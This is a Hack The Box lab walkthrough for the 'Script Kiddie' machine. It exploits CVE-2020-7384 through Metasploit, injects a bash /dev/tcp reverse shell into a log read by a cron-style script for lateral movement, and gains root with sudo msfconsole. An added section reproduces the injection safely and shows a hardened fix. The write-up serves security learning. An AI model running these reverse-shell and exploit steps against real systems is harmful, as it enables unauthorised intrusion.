Script kiddie Writeup Hackthebox/Htb

SCRIPT KIDDIE 

Enumeration:

Nmap

 PORT   STATE SERVICE VERSION  
 22/tcp  open ssh   OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)  
 | ssh-hostkey:   
 |  3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)  
 |  256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)  
 |_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)  
 5000/tcp open http  Werkzeug httpd 0.16.1 (Python 3.8.5)  
 |_http-title: k1d'5 h4ck3r t00l5  
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  

 The usual port 80 is not there, so port 5000 (a Werkzeug/Flask app) is our entry point. Let's check it out :)

Here is what we see when we browse to http://10.10.10.226:5000 (the page titled "k1d'5 h4ck3r t00l5"):

Exploitation

The page offers to build payloads with msfvenom and lets you upload your own APK as a template. After some Google searching, that turns out to be vulnerable to:

Rapid7 Metasploit Framework msfvenom APK Template Command Injection (CVE-2020-7384). Check it out.

It is a pretty easy exploit. The Metasploit module for it is recent, so update your Metasploit before using it:

msfupdate ----> use this command

STEPS:


1:  sudo msfconsole
2:  use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
3:  set lhost 10.10.14.xx
4:  set lport 9001
5:  set rhost 10.10.10.226
6:  set rport 5000
7:  exploit

Note: this is a file-format module, so it only builds a malicious APK; it does not talk to the target itself, and the RHOST/RPORT values in steps 5 and 6 are not used by it (they are harmless). What matters is LHOST/LPORT, and that something is listening on that port on your machine (a netcat listener or exploit/multi/handler) before you upload the file.

mv /root/.msf4/local/msf.apk .    (move the generated APK into the current directory)

Upload msf.apk as the template on http://10.10.10.226:5000.

Make sure you change the OS to android in the form; the APK template option is only used for that OS.

USER FLAG

 BOOM!! We get a reverse shell, lol, it's a piece of cake.

 kid@scriptkiddie:~$ cd /
 kid@scriptkiddie:/$ cd home
 kid@scriptkiddie:/home$ ls
 kid  pwn
 kid@scriptkiddie:/home$ cd kid
 kid@scriptkiddie:~$ cat user.txt
 0e4b318e4bd0405bc1ecbd22db500867
 kid@scriptkiddie:~$

HORIZONTAL PRIVILEGE ESCALATION

 kid@scriptkiddie:/home/pwn$ ls
 recon  scanlosers.sh
 kid@scriptkiddie:/home/pwn$ cat scanlosers.sh
 #!/bin/bash
 log=/home/kid/logs/hackers
 cd /home/pwn/
 cat $log | cut -d' ' -f3- | sort -u | while read ip; do
   sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
 done
 if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi


Move to the 'pwn' user's home and cat scanlosers.sh. It is an interesting bash script: it reads /home/kid/logs/hackers (a file we own as kid), throws away the first two space-separated fields of every line, and splices whatever is left, unquoted, into a string that is handed to sh -c. Nothing checks that the value is really an IP address, so a line that starts with ; in the third field gets executed as a command by the pwn user. After each run the script empties the log.

Let's move to the logs directory in kid's home and append our line to the hackers file.

Copy this simple command :)

 echo "x x ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.XX/1234 0>&1' #" >> hackers

The two x's are dummy fields so that cut -d' ' -f3- delivers our payload (everything from the ; onward) into ${ip}; the trailing # comments out the rest of the nmap command line. Be sure to change the IP and start a listener on port 1234 on your local machine first.

Sometimes it does not fire on the first try; because the script wipes the log after every run, just append the line again and keep an eye on your listener (it can take 4 or 5 attempts).

Yep!! We got the pwn user.

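To see exactly why the dummy fields matter, here is an added example (not part of the original writeup or the box) that re-creates the field handling of scanlosers.sh in a scratch directory, with a stub nmap that only logs its arguments (an assumption so nothing is scanned), and puts a hardened rewrite beside it. The log lines are constructed; the marker command is a harmless touch standing in for the reverse shell.

```shell
#!/bin/sh
# Added example, not from the original writeup: reproduces the parsing logic of
# /home/pwn/scanlosers.sh against constructed log lines. The "nmap" on PATH is a
# stub that records its arguments (assumption for an offline demo).
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
LOG="$WORK/hackers"
mkdir -p "$WORK/recon" "$WORK/bin"
printf '#!/bin/sh\necho "nmap $*" >> "%s/calls"\n' "$WORK" > "$WORK/bin/nmap"
chmod +x "$WORK/bin/nmap"
export PATH="$WORK/bin:$PATH"

# Same pipeline as the box's script (the background '&' is dropped so the
# outcome can be checked synchronously): everything from field 3 onward is
# spliced unquoted into a string that sh -c re-parses as shell syntax.
vulnerable_scan() {
  cd "$WORK" || return 1
  cut -d' ' -f3- "$LOG" | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null"
  done
  if [ "$(wc -l < "$LOG")" -gt 0 ]; then : > "$LOG"; fi
}

# Hardened rewrite: the third field must be a dotted quad before it is used,
# and nmap receives it as one argument, so no shell ever re-parses log data.
hardened_scan() {
  cd "$WORK" || return 1
  while read -r f1 f2 ip rest; do
    printf '%s\n' "$ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || continue
    nmap --top-ports 10 -oN "recon/${ip}.nmap" "$ip" >/dev/null 2>&1
  done < "$LOG"
  : > "$LOG"
}

# Writes one constructed log line, runs the given scanner function, and
# returns 0 if the injected marker command (touch) actually executed.
fires() {
  rm -f "$WORK/marker" "$WORK/calls"
  printf '%s\n' "$2" > "$LOG"
  "$1"
  [ -e "$WORK/marker" ]
}
# Same setup, but returns 0 if the scanner invoked nmap with $3 as target.
scanned() {
  rm -f "$WORK/marker" "$WORK/calls"
  printf '%s\n' "$2" > "$LOG"
  "$1"
  grep -q -- " $3\$" "$WORK/calls" 2>/dev/null
}

ONE_FIELD=" ;touch $WORK/marker #"      # payload sits in field 2: cut throws it away
THIRD_FIELD="x x ;touch $WORK/marker #" # two dummy fields: payload starts at field 3

for line in "$ONE_FIELD" "$THIRD_FIELD"; do
  if fires vulnerable_scan "$line"; then
    echo "vulnerable script: injection FIRED   for '$line'"
  else
    echo "vulnerable script: injection ignored for '$line'"
  fi
done
if fires hardened_scan "$THIRD_FIELD"; then
  echo "hardened script: injection FIRED"
else
  echo "hardened script: injection blocked"
fi
scanned hardened_scan "x x 10.10.14.5" 10.10.14.5 && echo "hardened script: still scans 10.10.14.5"
```

With the single-field line the stub nmap is called with the leftover text as a bogus output path and nothing else happens; with two dummy fields the ; ends the nmap command and touch runs, which is the same thing that gives the reverse shell on the box. The hardened loop keeps scanning genuine addresses but never hands the attacker-controlled text to a shell.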
ROOT FLAG

 Copy these commands :)

1:  sudo -l
2:  sudo msfconsole
3:  /bin/bash -p        (typed at the msf prompt)
4:  id
5:  cat /root/root.txt
6:  f5482d18d0acd025b5e86f11d568fd83

sudo -l shows that pwn may run msfconsole as root without a password. msfconsole hands any command it does not recognise to the operating system shell, so typing /bin/bash -p at its prompt drops us straight into a root shell, and id confirms it before we read the flag.